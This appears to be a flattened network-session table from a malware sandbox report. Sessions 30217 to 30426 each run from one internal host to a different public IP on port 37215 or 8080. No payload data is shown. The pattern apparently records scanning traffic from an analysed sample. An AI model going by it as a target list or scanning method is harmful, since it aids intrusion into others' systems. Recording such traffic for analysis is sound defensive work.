                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30217192.168.2.234175841.72.160.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30218192.168.2.2339424197.167.165.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30219192.168.2.233562050.162.65.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30220192.168.2.2340370197.104.197.337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30221192.168.2.2336070197.171.213.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30222192.168.2.235805441.237.218.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30223192.168.2.2335888120.30.80.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30224192.168.2.2337772197.60.44.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30225192.168.2.2333410157.195.138.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30226192.168.2.2334934157.29.13.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30227192.168.2.233963441.159.14.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30228192.168.2.2345848197.215.169.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30229192.168.2.2352068197.231.100.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30230192.168.2.2356562197.55.251.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30231192.168.2.2358132141.99.69.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30232192.168.2.2342060197.52.158.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30233192.168.2.2360714109.166.114.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30234192.168.2.2340626197.243.210.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30235192.168.2.2346854116.67.240.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30236192.168.2.235754241.6.126.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30237192.168.2.2334812197.221.137.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30238192.168.2.2347918197.57.0.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30239192.168.2.2345662197.99.105.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30240192.168.2.2349384197.20.120.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30241192.168.2.2351560197.200.207.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30242192.168.2.2338570197.225.6.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30243192.168.2.234448641.47.88.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30244192.168.2.235323241.188.225.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30245192.168.2.234216441.31.33.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30246192.168.2.2355920177.209.157.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30247192.168.2.235010058.86.39.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30248192.168.2.234790241.72.247.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30249192.168.2.233480437.120.67.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30250192.168.2.235440441.232.157.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30251192.168.2.2356816213.40.219.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30252192.168.2.234446441.215.197.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30253192.168.2.2341386157.55.31.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30254192.168.2.234233441.255.17.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30255192.168.2.2342364157.192.60.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30256192.168.2.2355052168.209.118.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30257192.168.2.2334470160.222.36.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30258192.168.2.2338430216.140.3.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30259192.168.2.2347702162.207.196.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30260192.168.2.233986285.197.130.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30261192.168.2.2359866101.53.21.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30262192.168.2.233874625.193.171.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30263192.168.2.234321059.79.124.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30264192.168.2.233561270.14.102.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30265192.168.2.2332974201.232.149.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30266192.168.2.2354458167.189.148.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30267192.168.2.235263849.208.21.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30268192.168.2.234174231.10.1.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30269192.168.2.2336030197.160.44.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30270192.168.2.233454080.126.254.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30271192.168.2.2356676218.175.192.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30272192.168.2.2352864161.135.239.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30273192.168.2.2357774221.97.57.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30274192.168.2.2346424202.54.63.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30275192.168.2.2339554153.32.85.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30276192.168.2.2350534166.54.33.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30277192.168.2.2343198147.151.119.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30278192.168.2.235018681.239.64.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30279192.168.2.2340902108.135.248.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30280192.168.2.2344644164.147.23.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30281192.168.2.2333298178.80.198.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30282192.168.2.2354940161.77.165.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30283192.168.2.2334188207.20.225.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30284192.168.2.2339026103.11.192.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30285192.168.2.234315886.53.97.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30286192.168.2.233752834.82.200.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30287192.168.2.2358288100.142.86.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30288192.168.2.2337422129.229.181.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30289192.168.2.2353974140.205.169.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30290192.168.2.2359548129.62.73.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30291192.168.2.234568050.154.249.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30292192.168.2.233576285.226.225.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30293192.168.2.23399704.170.170.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30294192.168.2.235682827.54.242.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30295192.168.2.2345644108.166.62.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30296192.168.2.234294478.139.45.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30297192.168.2.234689099.61.124.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30298192.168.2.23573149.31.61.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30299192.168.2.235802834.128.5.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30300192.168.2.235333088.239.229.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30301192.168.2.235629462.215.250.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30302192.168.2.2345026129.145.204.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30303192.168.2.2345374203.29.76.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30304192.168.2.2342084190.199.179.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30305192.168.2.233588259.231.231.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30306192.168.2.2343040164.83.88.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30307192.168.2.2346844213.183.239.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30308192.168.2.2355862158.60.139.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30309192.168.2.2333072213.122.251.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30310192.168.2.234231436.120.46.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30311192.168.2.2346906208.42.70.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30312192.168.2.235904642.112.103.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30313192.168.2.2352954116.207.192.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30314192.168.2.234233071.183.31.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30315192.168.2.2347722181.75.55.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30316192.168.2.2347160185.201.149.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30317192.168.2.234871844.226.189.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30318192.168.2.2344554166.110.116.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30319192.168.2.2347254142.194.85.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30320192.168.2.2351840115.183.48.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30321192.168.2.2353346164.43.245.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30322192.168.2.234891265.5.182.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30323192.168.2.2360218149.206.129.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30324192.168.2.2350970119.184.89.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30325192.168.2.235650854.106.101.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30326192.168.2.2351892199.206.81.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30327192.168.2.2337246147.79.224.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30328192.168.2.2337850152.94.158.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30329192.168.2.2347502107.239.243.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30330192.168.2.2352610175.166.58.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30331192.168.2.233425471.61.178.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30332192.168.2.2342480161.136.112.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30333192.168.2.2353250103.120.65.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30334192.168.2.233508435.90.155.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30335192.168.2.233335064.128.173.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30336192.168.2.2346214125.38.155.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30337192.168.2.2358736106.189.142.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30338192.168.2.233797074.227.174.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30339192.168.2.235933248.15.208.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30340192.168.2.2353588167.80.192.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30341192.168.2.2339756155.51.150.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30342192.168.2.2332892198.128.173.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30343192.168.2.2360504131.161.120.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30344192.168.2.234542418.212.41.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30345192.168.2.2332884186.224.228.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30346192.168.2.2344956220.90.126.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30347192.168.2.2357044180.164.232.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30348192.168.2.2360838143.85.133.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30349192.168.2.235932817.188.81.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30350192.168.2.23393749.104.202.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30351192.168.2.2343298121.81.171.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30352192.168.2.234693879.107.219.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30353192.168.2.234186839.215.29.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30354192.168.2.2341540193.76.66.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30355192.168.2.2353082167.227.1.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30356192.168.2.2342882199.125.78.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30357192.168.2.233843680.164.177.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30358192.168.2.234573886.40.215.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30359192.168.2.233816666.93.21.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30360192.168.2.2341530151.56.146.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30361192.168.2.2338796135.33.212.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30362192.168.2.235284493.214.54.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30363192.168.2.234112648.135.38.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30364192.168.2.2342140186.47.12.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30365192.168.2.2334952147.127.164.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30366192.168.2.2358996109.153.73.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30367192.168.2.23535682.175.139.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30368192.168.2.2342508163.81.133.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30369192.168.2.2350616103.189.70.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30370192.168.2.2355822190.81.10.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30371192.168.2.2354208182.54.38.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30372192.168.2.2338842136.119.171.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30373192.168.2.233400892.20.110.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30374192.168.2.233289066.214.44.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30375192.168.2.2358950173.237.194.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30376192.168.2.2353738150.117.63.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30377192.168.2.2350348137.183.250.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30378192.168.2.235434066.92.75.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30379192.168.2.2351554159.246.157.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30380192.168.2.235074238.250.111.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30381192.168.2.2348054180.179.15.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30382192.168.2.2346232200.52.98.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30383192.168.2.234555417.14.169.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30384192.168.2.235951071.59.4.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30385192.168.2.2333854169.83.169.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30386192.168.2.233816848.142.175.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30387192.168.2.2342958120.241.152.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30388192.168.2.2348870123.55.234.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30389192.168.2.2351554197.55.205.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30390192.168.2.2355314192.36.59.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30391192.168.2.2335676203.49.1.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30392192.168.2.2358712182.224.167.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30393192.168.2.23397924.233.88.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30394192.168.2.235242419.98.38.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30395192.168.2.2354786105.56.15.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30396192.168.2.2343536200.127.208.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30397192.168.2.2358396126.92.151.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30398192.168.2.234975472.178.229.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30399192.168.2.2346936120.131.190.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30400192.168.2.233632687.91.50.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30401192.168.2.2336210177.122.135.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30402192.168.2.2353946148.204.11.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30403192.168.2.2345324122.250.217.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30404192.168.2.2349646171.137.207.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30405192.168.2.2342932148.194.215.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30406192.168.2.233825035.88.152.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30407192.168.2.233992299.0.111.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30408192.168.2.2345128213.122.36.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30409192.168.2.2352556176.130.225.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30410192.168.2.2352854109.156.12.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30411192.168.2.2358278197.201.163.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30412192.168.2.2343180197.131.241.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30413192.168.2.235697654.154.91.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30414192.168.2.2346650197.178.159.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30415192.168.2.2357588197.162.120.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30416192.168.2.2358724197.182.61.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30417192.168.2.2346962157.126.231.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30418192.168.2.235930441.132.246.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30419192.168.2.2341526197.201.60.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30420192.168.2.2355820157.207.98.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30421192.168.2.2339572197.171.41.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30422192.168.2.2350160101.220.175.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30423192.168.2.2347792157.209.94.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30424192.168.2.2350624157.176.99.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30425192.168.2.2344588208.63.9.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30426192.168.2.2354530197.97.203.14537215
                                                        TimestampBytes transferredDirectionData


